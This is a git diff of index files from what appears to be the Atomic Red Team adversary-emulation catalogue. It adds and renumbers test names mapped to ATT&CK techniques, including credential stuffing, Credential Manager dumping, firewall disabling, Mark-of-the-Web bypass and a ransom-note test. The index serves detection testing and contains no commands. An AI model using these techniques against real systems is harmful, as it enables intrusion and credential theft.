persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -174,6 +183,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 721cf97b..b0eec59f 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
@@ -74,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -157,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5d54166f..cfb7be52 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
@@ -184,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -214,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
@@ -233,6 +236,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -411,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -570,6 +576,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -598,6 +605,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6c7e9586..62d2f1af 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -15,7 +15,9 @@
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+ - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
+ - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -24,6 +26,8 @@
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+ - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+ - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -105,7 +109,9 @@
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+ - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+ - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -370,6 +376,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+ - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -494,10 +501,11 @@
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+ - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+ - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+ - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+ - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+ - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
@@ -571,7 +579,7 @@
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- - Atomic Test #2: Create a user called "$" as noted here [windows]
+ - Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
@@ -621,13 +629,16 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+ - Atomic Test #1: Mount ISO image [windows]
+ - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+ - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
@@ -836,10 +847,12 @@
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
+ - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+ - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -871,7 +884,8 @@
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+ - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1013,6 +1027,7 @@
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+ - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1055,6 +1070,7 @@
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
+ - Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1432,7 +1448,8 @@
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+ - Atomic Test #1: Radmin Viewer Utility [windows]
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
@@ -1487,7 +1504,8 @@
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+ - Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1535,6 +1553,7 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+ - Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index de2b75a9..64db3fe8 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -11,7 +11,8 @@
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [macos, linux]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+ - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
@@ -37,7 +38,9 @@
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+ - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+ - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -137,6 +140,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+ - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -234,7 +238,8 @@
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+ - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -401,10 +406,12 @@
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+ - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+ - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -414,7 +421,8 @@
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+ - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
@@ -466,6 +474,7 @@
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+ - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
